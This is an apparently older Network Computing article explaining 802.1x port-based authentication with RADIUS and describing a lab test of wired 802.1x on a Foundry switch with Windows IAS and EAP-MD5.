Network Computingwww.networkcomputing.com

Architecturally Speaking

The 802.1x protocol consists of three main elements. The supplicant is a client device, such as a desktop, laptop or PDA, that requires secure network access. Then there's the authenticator, which can be an intermediary device, such as a wireless access point or a network switch. It exchanges information between the supplicant and the authentication server, the third piece of 802.1x. The authentication server can be a RADIUS server that authenticates users with its own user database or by working with an external user database, such as Microsoft's Active Directory or another LDAP database.

RADIUS servers are a popular choice for the 802.1x authentication server because most enterprises use them for secure dial-in user access. With a RADIUS server, you can avoid storing user information on each access point or network switch. It's also helpful for redundancy purposes, where a backup RADIUS server can take over the authentication process if the primary server fails. RADIUS supports most of the commonly used EAP authentication mechanisms, such as TLS, TTLS, LEAP, MD5 and PEAP.

For a SOHO wireless environment where it's not feasible to set up a RADIUS server for 802.1x, an administrator at the office or a user working from home can use a preshared key entered manually on both the client and access points. The access point then creates a WEP key and sends it to the wireless client, encrypting it with the preshared key.

All Wired

Organizations deploying 802.1x can authenticate their users to the LAN with a user name-password combination or stronger authentication. 802.1x authentication is widely available from big-name switch vendors, including Alcatel, Cisco Systems, Enterasys Networks, Extreme Networks and Foundry Networks. When a switch--the authenticator--detects an active client at the other end of the link in an 802.1x-enabled port, it initiates the 802.1x authentication process.

We recently tested 802.1x security on a wired Ethernet LAN in Network Computing's Real-World Labs® at Syracuse University. A Foundry Networks FastIron 4802 switch was the 802.1x authenticator, and the authentication server was a Microsoft Windows 2000 Advanced Server with Internet Authentication Services (IAS). On the IAS server, we registered the Foundry switch as a client device and set the remote-access policy to allow network access only during normal business hours.

We used MD5 as our authentication algorithm. MD5 uses a one-way hash function with the shared key and challenge to verify the supplicant's credentials, and it's the simplest one to use in the 802.1x world. However, it's not typically the algorithm of choice on the wireless side because it supports only client authentication, which leaves it vulnerable to rogue wireless APs (access points).

802.1x is disabled by default on all switch ports. So we used the Foundry switch's command-line interface to configure it for 802.1x authentication on the ports supporting 802.1x clients.

We also activated the 802.1x feature on the Windows XP client, which meant changing the 802.1x setting on the Foundry switch to the auto mode. That lets users authenticate with 802.1x after the Windows XP client with EAP-MD5 connects to the port. Then 802.1x prompts you to enter your user name and password to reach the network. In all, our lab test demonstrated that wired 802.1x is easy to deploy and configure, and that it works well with existing security solutions such as ACLs (access-control lists) and VLANs (virtual LANs)